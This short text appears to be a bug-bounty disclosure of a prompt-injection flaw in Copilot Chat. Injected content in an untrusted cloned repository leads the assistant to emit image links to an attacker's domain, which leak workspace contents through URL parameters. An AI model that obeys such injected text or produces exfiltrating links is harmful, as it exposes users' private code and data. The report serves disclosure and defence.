Due to insecure output handling in Copilot client interfaces, a prompt injection initiated attack was able to result in data exfiltration in a number of ways. A user that was prompt injected, by running Copilot Chat in a specific manner on an untrusted repository, could have generated arbitrary image links pointing to an attacker controlled domain that would be rendered in the Copilot Chat interface, allowing for data exfiltration via URL parameters. This attack could potentially have allowed a compromised Copilot session (Copilot Chat being called on a malicious cloned local repository) to exfiltrate the contents of the same workspace to the malicious domain.
https://hackerone.com/reports/2383092